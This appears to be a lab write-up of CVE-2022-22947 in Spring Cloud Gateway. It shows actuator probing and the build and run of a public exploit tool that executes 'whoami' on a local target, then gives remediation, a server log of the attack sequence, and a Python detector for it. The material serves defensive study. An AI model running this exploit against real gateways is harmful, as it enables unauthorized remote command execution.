
The open-source project Spring Cloud Gateway has a remote code execution vulnerability, tracked as CVE-2022-22947.

Affected versions:

  • 3.1.0
  • 3.0.0 to 3.0.6
  • older, unsupported versions are also affected

Vulnerability discovery

Lab target:

java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar --debug

  .   ____          _            __ _ _
 /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
 \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
  '  |____| .__|_| |_|_| |_\__, | / / / /
 =========|_|==============|___/=/_/_/_/
 :: Spring Boot ::       (v2.6.3-SNAPSHOT)
 
 Netty started on port 9000
  • the "gateway" entry is the telltale keyword
$ curl http://localhost:9000/actuator

{"_links":{"self":{"href":"http://localhost:9000/actuator","templated":false},"gateway":{"href":"http://localhost:9000/actuator/gateway","templated":false}}}

exp

Original repository

$ git remote -v
origin	https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway.git (fetch)
origin	https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway.git (push)
$ go build main.go
go: downloading github.com/panjf2000/ants/v2 v2.4.8
go: downloading github.com/go-resty/resty/v2 v2.7.0
go: downloading golang.org/x/net v0.0.0-20211029224645-99673261e6eb

$ ./main -u http://127.0.0.1:9000 -c whoami
http://127.0.0.1:9000  'bin4xin\n'

Remediation

  • Users on 3.1.x should upgrade to 3.1.1 or later; users on 3.0.x should upgrade to 3.0.7 or later.
  • Where it does not affect the business, disable the gateway actuator endpoint by setting the configuration option management.endpoint.gateway.enabled to false.

Detection approach

Traffic detection: analyze HTTP traffic and look for abnormal requests to the actuator gateway API. The DEBUG log below shows what such a request sequence looks like on the server side.

2022-03-15 10:22:26.711 DEBUG 11029 --- [ctor-http-nio-2] o.s.w.s.adapter.HttpWebHandlerAdapter    : [68b629bb-1] HTTP POST "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-2] a.e.w.r.ControllerEndpointHandlerMapping : [68b629bb-1] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#save(String, RouteDefinition)
[ctor-http-nio-2] .r.m.a.RequestBodyMethodArgumentResolver : [68b629bb-1] Content-Type:application/json
[ctor-http-nio-2] .r.m.a.RequestBodyMethodArgumentResolver : [68b629bb-1] 0..1 [org.springframework.cloud.gateway.route.RouteDefinition]
[ctor-http-nio-2] o.s.http.codec.json.Jackson2JsonDecoder  : [68b629bb-1] Decoded [RouteDefinition{id='LZQXX', predicates=[], filters=[FilterDefinition{name='AddResponseHeader', args= (truncated)...]
[ctor-http-nio-2] o.s.w.s.adapter.HttpWebHandlerAdapter    : [68b629bb-1] Completed 201 CREATED
[ctor-http-nio-3] o.s.w.s.adapter.HttpWebHandlerAdapter    : [36032421-2] HTTP POST "/actuator/gateway/refresh"
[ctor-http-nio-3] a.e.w.r.ControllerEndpointHandlerMapping : [36032421-2] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#refresh()
[ctor-http-nio-3] o.s.w.s.adapter.HttpWebHandlerAdapter    : [36032421-2] Completed 200 OK
[ctor-http-nio-4] o.s.w.s.adapter.HttpWebHandlerAdapter    : [9763438e-3] HTTP GET "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-4] a.e.w.r.ControllerEndpointHandlerMapping : [9763438e-3] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#route(String)
[ctor-http-nio-4] .s.w.r.r.m.a.ResponseEntityResultHandler : [9763438e-3] Using 'application/json' given [*/*] and supported [application/json, application/*+json, application/x-ndjson, text/event-stream]
[ctor-http-nio-4] .s.w.r.r.m.a.ResponseEntityResultHandler : [9763438e-3] 0..1 [java.util.Map<java.lang.String, java.lang.Object>]
[ctor-http-nio-4] o.s.http.codec.json.Jackson2JsonEncoder  : [9763438e-3] Encoding [{predicate=RouteDefinitionRouteLocator$$Lambda$918/2002125647, route_id=LZQXX, filters=[[[AddRespons (truncated)...]
[ctor-http-nio-4] o.s.w.s.adapter.HttpWebHandlerAdapter    : [9763438e-3] Completed 200 OK
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter    : [1f92a2eb-4] HTTP DELETE "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-5] a.e.w.r.ControllerEndpointHandlerMapping : [1f92a2eb-4] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#delete(String)
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter    : [1f92a2eb-4] Completed 200 OK
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter    : [1f92a2eb-5] HTTP POST "/actuator/gateway/refresh"
[ctor-http-nio-5] a.e.w.r.ControllerEndpointHandlerMapping : [1f92a2eb-5] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#refresh()
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter    : [1f92a2eb-5] Completed 200 OK
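
The following is an added example (not code from the original page or from the referenced repository) that turns the traffic-detection idea above into a small log analyzer. It parses Spring WebFlux DEBUG lines of the shape shown above, pairs each "HTTP <method> <path>" line with its "Completed <status>" line by request id, and scores the write-then-refresh pattern on the gateway actuator: a POST to /actuator/gateway/routes/<id> is suspicious on its own, a POST /actuator/gateway/refresh while such a write is pending is the moment the new route goes live, a GET of that route afterwards is a read-back, and a DELETE is typical cleanup. The sample log is constructed for the example (it mirrors the page's request ids and adds one benign /actuator/health request); the severity labels and the Alert/Request classes are this example's own choices.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample, modelled on the Spring WebFlux DEBUG lines above.
# The last request is benign traffic added to show it produces no alert.
SAMPLE_LOG = """\
2022-03-15 10:22:26.711 DEBUG 11029 --- [ctor-http-nio-2] o.s.w.s.adapter.HttpWebHandlerAdapter    : [68b629bb-1] HTTP POST "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-2] o.s.w.s.adapter.HttpWebHandlerAdapter    : [68b629bb-1] Completed 201 CREATED
[ctor-http-nio-3] o.s.w.s.adapter.HttpWebHandlerAdapter    : [36032421-2] HTTP POST "/actuator/gateway/refresh"
[ctor-http-nio-4] o.s.w.s.adapter.HttpWebHandlerAdapter    : [9763438e-3] HTTP GET "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter    : [1f92a2eb-4] HTTP DELETE "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter    : [1f92a2eb-5] HTTP POST "/actuator/gateway/refresh"
[ctor-http-nio-6] o.s.w.s.adapter.HttpWebHandlerAdapter    : [aa11bb22-6] HTTP GET "/actuator/health"
"""

# The request line and the later "Completed <status>" line share a bracketed
# request id, which is what lets us reassemble one request from several lines.
REQUEST_RE = re.compile(r'\[(?P<rid>[0-9a-f]+-\d+)\] HTTP (?P<method>[A-Z]+) "(?P<path>[^"]+)"')
STATUS_RE = re.compile(r'\[(?P<rid>[0-9a-f]+-\d+)\] Completed (?P<status>\d{3})')
ROUTE_RE = re.compile(r'^/actuator/gateway/routes/(?P<route_id>[^/?]+)$')
REFRESH_PATH = '/actuator/gateway/refresh'


@dataclass
class Request:
    rid: str
    method: str
    path: str
    status: Optional[int] = None


@dataclass
class Alert:
    severity: str   # 'low', 'medium' or 'high' (this example's own scale)
    rid: str
    reason: str


def parse_requests(log_text: str) -> List[Request]:
    """Rebuild requests (method, path, final status) from DEBUG log lines."""
    by_id: Dict[str, Request] = {}
    ordered: List[Request] = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            req = Request(m['rid'], m['method'], m['path'])
            by_id[req.rid] = req
            ordered.append(req)
            continue
        m = STATUS_RE.search(line)
        if m and m['rid'] in by_id:
            by_id[m['rid']].status = int(m['status'])
    return ordered


def detect(requests: List[Request]) -> List[Alert]:
    """Flag actuator route writes and the refresh that activates them."""
    alerts: List[Alert] = []
    pending: Dict[str, str] = {}   # route_id -> rid of the POST that wrote it
    activated = set()              # route ids made live by a refresh
    for r in requests:
        rm = ROUTE_RE.match(r.path)
        route_id = rm['route_id'] if rm else None
        if route_id and r.method == 'POST':
            alerts.append(Alert('medium', r.rid, f'route {route_id!r} written via actuator'))
            if r.status == 201:          # the write was accepted
                pending[route_id] = r.rid
        elif route_id and r.method == 'GET' and route_id in activated:
            alerts.append(Alert('medium', r.rid, f'route {route_id!r} read back after refresh'))
        elif route_id and r.method == 'DELETE':
            alerts.append(Alert('low', r.rid, f'route {route_id!r} deleted via actuator'))
            pending.pop(route_id, None)
            activated.discard(route_id)
        elif r.path == REFRESH_PATH and r.method == 'POST':
            if pending:
                # Refresh is what makes an actuator-written route (and its filters) live.
                alerts.append(Alert('high', r.rid,
                                    'refresh activated actuator-written route(s): ' + ', '.join(sorted(pending))))
                activated.update(pending)
                pending.clear()
            else:
                alerts.append(Alert('low', r.rid, 'gateway refresh via actuator'))
    return alerts


def scan_log(log_text: str) -> List[Alert]:
    return detect(parse_requests(log_text))


if __name__ == '__main__':
    for a in scan_log(SAMPLE_LOG):
        print(f'[{a.severity:6}] {a.rid}: {a.reason}')
```

On the sample this yields five alerts, the high one on the first refresh; the health check produces none. In production the same rules apply equally well to access logs or a WAF feed, and because the route-management endpoints are only reachable when the gateway actuator is exposed, any hit at all on them is worth reviewing against the remediation above.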

That's all.

References